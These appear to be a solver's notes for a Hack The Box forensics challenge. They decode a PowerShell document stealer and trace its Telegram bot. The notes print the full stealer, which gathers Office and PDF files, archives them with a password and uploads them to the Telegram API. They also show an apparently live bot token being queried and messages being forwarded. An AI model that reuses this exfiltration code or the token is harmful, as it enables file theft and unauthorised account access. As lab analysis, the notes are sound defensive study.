tid RegBinary 8F-57-5C-4D-35-34-0E-9E-BA-02-4A-9F-C6-07-8E-B7-7B-78-09-8C-8B-BE-BD-F8-7C-C0-0E-C4-FF-7E-BE-BC-CD-F4-E7-6D-D6-62-09-88-7C-70-C1-4A-39-80-8E-5A-86-28-C5-79-59-5A-37-3C-E3-E7-E9-80-A3-F0-D6-30-65-94-1E-EF-41-F3-72-6F-14-37-B5-53-89-B8-01-17
GUID RegSz 06bbc6ad-a624-416f-8163-30410218a149
Update RegDword 328656233
Key: {BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}
From environment:
$bid=caea556bb7fa0634c63f7c12f1ccab1a5eecce0f45153147ff418d71e5360ecddce3c229b8c6ec9a92216cfff01ea63c
$hid=93b4543062046283c32adde19625f66f5c9ff9fe38f2a3cb8bef060880fb42965e132de327675e0165937992ca8a0bd8
$tid=8f575c4d35340e9eba024a9fc6078eb77b78098c8bbebdf87cc00ec4ff7ebebccdf4e76dd66209887c70c14a39808e5a8628c579595a373ce3e7e980a3f0d63065941eef41f3726f1437b55389b80117
Decrypted:
$bid = [byte[]]@(0xCA,0xEA,0x55,0x6B,0xB7,0xFA,0x06,0x34,0xC6,0x3F,0x7C,0x12,0xF1,0xCC,0xAB,0x1A,0x5E,0xEC,0xCE,0x0F,0x45,0x15,0x31,0x47,0xFF,0x41,0x8D,0x71,0xE5,0x36,0x0E,0xCD,0xDC,0xE3,0xC2,0x29,0xB8,0xC6,0xEC,0x9A,0x92,0x21,0x6C,0xFF,0xF0,0x1E,0xA6,0x3C)
$hid = [byte[]]@(0x93,0xb4,0x54,0x30,0x62,0x04,0x62,0x83,0xc3,0x2a,0xdd,0xe1,0x96,0x25,0xf6,0x6f,0x5c,0x9f,0xf9,0xfe,0x38,0xf2,0xa3,0xcb,0x8b,0xef,0x06,0x08,0x80,0xfb,0x42,0x96,0x5e,0x13,0x2d,0xe3,0x27,0x67,0x5e,0x01,0x65,0x93,0x79,0x92,0xca,0x8a,0x0b,0xd8)
$tid = [byte[]]@(0x8f,0x57,0x5c,0x4d,0x35,0x34,0x0e,0x9e,0xba,0x02,0x4a,0x9f,0xc6,0x07,0x8e,0xb7,0x7b,0x78,0x09,0x8c,0x8b,0xbe,0xbd,0xf8,0x7c,0xc0,0x0e,0xc4,0xff,0x7e,0xbe,0xbc,0xcd,0xf4,0xe7,0x6d,0xd6,0x62,0x09,0x88,0x7c,0x70,0xc1,0x4a,0x39,0x80,0x8e,0x5a,0x86,0x28,0xc5,0x79,0x59,0x5a,0x37,0x3c,0xe3,0xe7,0xe9,0x80,0xa3,0xf0,0xd6,0x30,0x65,0x94,0x1e,0xef,0x41,0xf3,0x72,0x6f,0x14,0x37,0xb5,0x53,0x89,0xb8,0x01,0x17)
$bid1 = decrypt $bid;
$hid1 = decrypt $hid;
$tid1 = decrypt $tid;
$i0 = "$bid1`:$tid1";
$bid=7035285918
$hid=6959962141
$tid=AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4
$i0=7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4
Telegram Bot:
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getMe' | jq .
{
"ok": true,
"result": {
"id": 7035285918,
"is_bot": true,
"first_name": "HTBot-01",
"username": "ca1_htbot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false
}
}
https://core.telegram.org/bots/api#getchat
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getChat?chat_id=6959962141' | jq .
{
"ok": true,
"result": {
"id": 6959962141,
"first_name": "Truong",
"last_name": "D.Mylan",
"username": "Pirate_D_Mylan",
"type": "private",
"active_usernames": [
"Pirate_D_Mylan"
],
"max_reaction_count": 11,
"accent_color_id": 6
}
}
Question 8:
[8/10] What day did the attacker's server first send a 'new-connection' message? (Format: DD/MM/YYYY)
> 18/04/2024
[+] Correct!
From question 1?
1713451126 = GMT: Thursday, April 18, 2024 2:38:46 PM
Question 9
[9/10] What's the password for the 7z archive
> arameter-none
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getChatMember?chat_id=6959962141&user_id=6959962141,' | jq .
{
"ok": true,
"result": {
"user": {
"id": 6959962141,
"is_bot": false,
"first_name": "Truong",
"last_name": "D.Mylan",
"username": "Pirate_D_Mylan"
},
"status": "member"
}
}
curl -s 'https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/sendMessage?chat_id=6959962141&text=test' | jq .
{
"ok": false,
"error_code": 403,
"description": "Forbidden: bot was blocked by the user"
}
How We Were Able to Infiltrate Attacker Telegram Bots https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/
Bot Token: bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4
Attacker Chat ID: 6959962141
Get Updates: Chat ID: Message ID:
https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getUpdates
Forwarding all messages to my chat with bot:
(curl -useb "https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getUpdates").Content
{"ok":true,"result":[{"update_id":328656365,
"message":{"message_id":8372,"from":{"id":1858014168,"is_bot":false,"first_name":"Yannis","language_code":"en"},"chat":{"id":1858014168,"first_name":"Yannis","type":"private"},"date":1716237187,"text":"/start","entities":[{"offset":0,"length":6,"type":"bot_command"}]}},{"update_id":328656366,
"message":{"message_id":8373,"from":{"id":7113801243,"is_bot":false,"first_name":"Matt","language_code":"en"},"chat":{"id":7113801243,"first_name":"Matt","type":"private"},"date":1716237470,"text":"/start","entities":[{"offset":0,"length":6,"type":"bot_command"}]}}]}
bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/getUpdates
attacker_bot_token ⇒ The attacker’s bot token we found in the first step (in this case: 6414966437:AAHtThsoeAj36fZY4941ZVfnzRpMQXVXz_Y)
attacker_chat_id ⇒ The attacker’s chat ID which we found in the first step (in this case: 6200912483)
my_chat_id ⇒ My chat ID, which we found in the previous step (in this case: 6348918997)
message_id ⇒ The message ID we found in the previous step (in this case: 2170)
curl -Uri "https://api.telegram.org/bot7035285918:AAE_fggsw0MN6tv7HJbMWVXdoiaoaGBMcy4/forwardMessage" -Method POST -ContentType "application/json" -Body '{"from_chat_id":"6959962141", "chat_id":"7113801243", "message_id":"8372"}'
curl -Uri "https://api.telegram.org/bot/forwardMessage" -Method POST -ContentType "application/json" -Body '{"from_chat_id":"{attacker_chat_id}", "chat_id":"{my_chat_id}", "message_id":"{message_id}"}'
Decrypting base64/inflate with Cyberchef:
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=cFZadGIrSTRFUDVlcWYvQmlxSkxva3RTQXFWQVQwaEhLYjFXdDdSVm9WcnB5bW92SklhNG05aloyRkN5YmYvN2paMEUwcmQ3MGZHQlpPenh6RE9QNXlWM2s1d0xuTGlYV0xnVG5LMUpnSzhab1dMc1UzK0pzeS9IeHhNY3JESWk4dXVNQ1Jhd3VQK3JxVTFqN2pVMVd6Mjk0Z24vRXg2M05HdC9UL2U5L2pKRjJ2bnZ3OXZqMld4RTF5UmpOTUZVYVB0N2l4VU5CR0VVUlo2cDN6Y3M5TGkvaCtDbnJ3OVJIOTJWY0NxbjdqRExVOEdXbVo5R3VYdnU4MmdRTHhuc1JBbEFHMmJZRjlnMGtyQnRXS1daVFF2TWdERjN5SkowSmJBOFkxWm1wM2dqM0JFTldFam9FZ3pjVHMrNjdtOVluT1FDY3dXbk1rT1BhbWhPaUJneXVzYVpVSXhNMlVSa1lNQUVaNlYraHNVcW8vS1llNFBUMkE4QWxXUFl5SkM0bm9HUysyWWZhSEZ2MHhBUWczeFd5TXNWQ1VGYWVrcWFLeUZ2S1VFbzRiNnRoRWdLVytwNHo5U3BaME93M1IxLzN6cUFlRWtBZzFlc0xCalFFMFNtUG04alFxV0NDM2VZUWhTNTlZZ0tIWFZ5SldPVjI1ZCtndEhQU1B0RmczODRWdE5SdEVhZVZONnRrZ1ZRMEVVTy9pNFZyTWZkVG8wVDA0UmNBRkRJVWViQnJPWEt2NTN5Yy9INi9BbzJiVmF3NFlZbXEvazNuRXNMM0xUcW52UjFGNUR4SHBLVVNQQXpCWjQyTFVuUFM2enJydnNKMDZXSWtMTVVxUEVCWUZEN0NGdXBvV25GcFNhTnduV1o2Wnd0eElPZjRWa1ErNXhqUHJ1Z2tEQUxTQVlOYVVlQjN6d01PMEZuY2JRNE9qeHErNHQ1dHhuNlFlak5HMEhIVzlSTGcvYXFXMDM5ekUrUXVjTnpONGRVdmZ2eVJhZXRZckZLMkVDV3p5VitjSzdtOXpnUXFFemRpeXQzakJPVzVaQ3kyRStBcEphTkdwQTZ0RlZ5c1RYUWZtbmdSRGt5VzgxdFpUVmxtZ1NIa09GK2FJSitZU2hvdnpSRUZuQVZvT3RRWE45RU5iTHhob2dYdk1vVWZRLzkrMjNnWmhFMHU3M3VLYzdJR3BlbG14UlFLcXp6RHBKZzUrMWRkZThDV2ZmUW0xM3ZxTnFOWGtONUY4TUE4NkpGaHVVeHJQcE8xSGFMcG5TS0E2V2VRZmwxYk9tenN2L3d5djZyR3lxMXZuZitBeUdGVU41d3JUU0NRMXNDcy8raHJkYVBqMW1Jb2NYSks3YTJVS0NYcHZtVW1ZQjlGNFY3elRoUjZkcEhqWEkxZnh0YllWYmF3MW5kd0tvbitjcmJLcHVtYkVSRDA5cGFjVThKVHhuSFpnM0Q2NldIdDFxUW02K1dxcEplOWNvMjNQYkFMZFFYdktsV1c0bDVTN1hoU2x4Q0Q5V0pMRzlOcnY1NUxGV2hSSFhlT1lRQmFMZ2hDd3hiUFRieXVZbDUrVkJpbW9yeVVZamhRczRCUFc1NGZVM0hkSDBNbDVITzRQQktUa1grVlRkTnlFVG5GQkxIY3JmanhjamhOeDZINGZsNWtuQnVXSlliOExWRThkRCt2NFk2UDZTZHFBUGpwVEpUMk9WOWFXQVlrVGk4Z0ZYa1hQdlFMN2NURkc1VUxzamh5NUk1b2RoVTUyOG5vNXZybTZ1emkwOGoyeml0NElBajVOekluT01ZT2FNc1k5bWc2SEFURW9OQ25NTllGWVN1OE5QbkNHZTRUSnRIeVRKeUF0anpDZVZJLytxT05nSlREaWVmbnlZNEJwMHF3K1JFc005V2NheGVQdmxjZklZRXgxTWlKZFY1eXJDZVJwdVVaUkFaWDVjeHllc0FWT1hYQUxxbEJONXdwWDdHc2hHTW9RcVNyQUNuUmdoZ3Fyd2k1eFJ6aU1KWGtmMGRVMEMzRFFmbElja011QWl3ek1xMTErcC85SW5pODRDUS9iMmZrREU4bnNIOFhzcUJjQWIwOFZuSCtZT2tzODRQRjIrd2dYemtpTTRQNUNTYk5uTFUzTUF3ZlJ6S1pCK0drSXA0VlhCYjZFOVhLK0ZjZ3JDL053aERaNXFuRU0wQVpsY3lqOVd3UmJYUHczTWhaSTdBZkU3NkZHcWN2ZWhNbFlZN1hzV0NnSDhCNFNXUWlMNjhZN2pzOHFnTGpremRmTnZhdGdhS3BDMVB5VUwxTE5zSUlsOThKYUVxbzNLclgyTmFFbEsyclVFY2x6TUJRcFhxdE52cy80MDdxVHpJTWordlBKcVZBN3RoVjYrN0VTZk51ZWVxblhFVmkxR3FLUGFnMmdWYzRBRjhBaEtxd0NaSDhEa0hGK3d1c2VEbFoyTXB6aFZNVFM5S2FIZzF2cjZkam00dUIrT1Jxay81TFZxakRQemFSbFhwaGkwTksvdjhuY3Q0TTFNS08wVWJIL0NjQmpBeHVlVis5b21RclpKa2tOZGpMQ0lXSW1qckFqa25MTXdSNkVBVFVlU1lrSyszR1VGYUJKeng0NE1EUHlXdWdGS1UrZWl5Ykhrd1p3STY1Z0hITkt3YWdJYWNraHlWV1FXSWlydmF6cTVUV1IrVTN3MUVzOGJPdit4SUg5UVp3SzlYdmxxdXI4b2lxVmIvQWc9PQ&oeol=VT
Decrypting:
( New-oBjeCt sysTem.IO.STREaMREadER((New-oBjeCt system.io.cOmpReSSIoN.DefLaTeSTream([IO.MemOrYstreAm] [sYSTeM.convErT]::FrombaSe64StrING( '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') ,[IO.comPressiOn.coMpReSsIOnmODe]::deCOMPress ) ) , [SYStem.TEXT.ENcODiNG]::ascII)).Readtoend() |Out-String
[System.Net.ServicePointManager]::SecurityProtocol=@("Tls12","Tls11","Tls","Ssl3")
$a1=gp "HKCU:\\Environment"
function h1($j0) {
$v4 = [System.Security.Cryptography.HashAlgorithm]::Create('md5')
$x3 = $v4.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($j0))
$n6 = [System.BitConverter]::ToString($x3)
return $n6.Replace('-', '')
}
$j2=$a1.Update
$F2=$a1.guid
$g1=$a1.bid
$y3=$a1.tid
$j5=$a1.hid
function s9($n1, $x8) {
$k7 = gi $n1
foreach($b5 in $k7.Property){
$u6 = $k7.Name + ";" + $b5
$x3 = h1 $u6
if($x8 -eq $x3){
return ((gp $n1 -Name $b5).$b5)
}
}
foreach($n2 in $k7.GetSubkeyNames()){
$v8 = s9 ($n1 + "\" + $n2) $x8
if($v8.Length -gt 0){
return $v8
}
}
return ""
}
$m0 = s9 "HKCU:\software\classes\Interface" "6ca24d7c7f6f6465afb82dacd1b0c71f"
function n9 {
param (
[byte[]]$n3
)
$c4 = New-Object System.IO.MemoryStream($n3, 0, $n3.Length)
$c5 = New-Object Byte[](32)
$x2 = $c4.Read($c5, 0, $c5.Length)
if ($x2 -ne $c5.Length) {
exit
}
$b5 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($m0, $c5)
$b7 = $b5.GetBytes(32)
$v9 = $b5.GetBytes(16)
$h5 = New-Object Security.Cryptography.AesManaged
$e3 = $h5.CreateDecryptor($b7, $v9)
$w5 = New-Object IO.MemoryStream
$q7 = New-Object System.Security.Cryptography.CryptoStream(
$c4, $e3, [System.Security.Cryptography.CryptoStreamMode]::Read)
$q7.CopyTo($w5)
$w5.Position = 0
$y5 = New-Object IO.StreamReader($w5)
$u9 = $y5.ReadToEnd()
$y5.Dispose()
$q7.Dispose()
$w5.Dispose()
$c4.Dispose()
return $u9
}
$j51 = n9 $j5
$y31 = n9 $y3
$g11 = n9 $g1
$i0 = "$g11`:$y31"
$s74=@('.doc','.docx','.xls','.xlsx','.ppt','.pptx','.pdf')
$l01="$env:temp\documents_$((Get-Date).ToString('yyyyMMddHHmmss')).csv"
$w51="$env:temp\documents_$((Get-Date).ToString('yyyyMMddHHmmss')).7z"
$h75=$env:temp
$w51s=Get-ChildItem -Path ([System.IO.Path]::Combine($env:USERPROFILE,'Documents')) -Recurse -ErrorAction SilentlyContinue|Where-Object{$s74 -contains $_.Extension}|Select-Object Name,FullName,LastWriteTime,Length
$w51s|Export-Csv -Path $l01 -Encoding Unicode
$w51s|ForEach-Object{Copy-Item -Path $_.FullName -Destination ([System.IO.Path]::Combine($h75,$_.Name)) -Force}
$v13=[System.Text.Encoding]::ascii
& 'C:\Program Files\7-Zip\7z.exe' a -t7z -mx5 -parameter-none $w51 $l01 $w51s.FullName|Out-Null
Add-Type -AssemblyName System.Net.Http
$form=new-object System.Net.Http.MultipartFormDataContent
$form.Add($(New-Object System.Net.Http.StringContent $j51),'chat_id')
$Content=[System.IO.File]::ReadAllBytes($w51)
$n82=New-Object System.Net.Http.ByteArrayContent ($Content,0,$Content.Length)
$n82.Headers.Add('Content-Type','text/plain')
$m63=$v13.getstring($v13.getbytes("$($env:COMPUTERNAME).7z"))
$form.Add($n82,'document',$m63)
$ms=new-object System.IO.MemoryStream
$form.CopyToAsync($ms).Wait()
irm -Method Post -Body $ms.ToArray() -Uri "https://api.telegram.org/bot$i0/sendDocument" -ContentType $form.Headers.ContentType.ToString()
$w51s|ForEach-Object{Remove-Item -Path ([System.IO.Path]::Combine($h75,$_.Name)) -Force}
ri -Path $l01 -Force
ri -Path $w51 -Force
Encrypted Zip:
$ 7z l -slt DESKTOP.7z
7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 3627868 bytes (3543 KiB)
Listing archive: DESKTOP.7z
--
Path = DESKTOP.7z
Type = 7z
Physical Size = 3627868
Headers Size = 300
Method = LZMA2:22 7zAES
Solid = +
Blocks = 1
----------
Path = documents_20240418220516.csv
Size = 516
Packed Size = 3627568
Modified = 2024-04-18 11:05:16.1378091
Attributes = A
CRC = 955298D3
Encrypted = +
Method = LZMA2:22 7zAES:19
Block = 0
Path = Explosive_Materials_Acquisition_Report_Final_Stylish.pdf
Size = 3667983
Packed Size =
Modified = 2024-04-16 09:14:24.8331250
Attributes = RA
CRC = 80BDD4E7
Encrypted = +
Method = LZMA2:22 7zAES:19
Block = 0
& 'C:\Program Files\7-Zip\7z.exe' a -t7z -mx5 -parameter-none $w51 $l01 $w51s.FullName|Out-Null
Password: -parameter-none => arameter-none
Decrypt:
7z x DESKTOP.7z
7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 3627868 bytes (3543 KiB)
Extracting archive: DESKTOP.7z
--
Path = DESKTOP.7z
Type = 7z
Physical Size = 3627868
Headers Size = 300
Method = LZMA2:22 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):arameter-none
Everything is Ok
Files: 2
Size: 3668499
Compressed: 3627868
Question 10
[10/10] Submit the md5sum of the 2 files in the archive that the attacker exfiltrated (sort hashes, connect with '_', ie: 5f19a..._d9fc0...)
> 83aa3b16ba6a648c133839c8f4af6af9_ffcedf790ce7fe09e858a7ee51773bcd
[+] Correct!
[+] Here is the flag: HTB{t3l3gr4m_b4ckf1r3d!!!_cca8fe0565dfb01167e6ac4505798390}
$ md5sum documents_20240418220516.csv Explosive_Materials_Acquisition_Report_Final_Stylish.pdf
83aa3b16ba6a648c133839c8f4af6af9 documents_20240418220516.csv
ffcedf790ce7fe09e858a7ee51773bcd Explosive_Materials_Acquisition_Report_Final_Stylish.pdf
Flag: HTB{t3l3gr4m_b4ckf1r3d!!!_cca8fe0565dfb01167e6ac4505798390}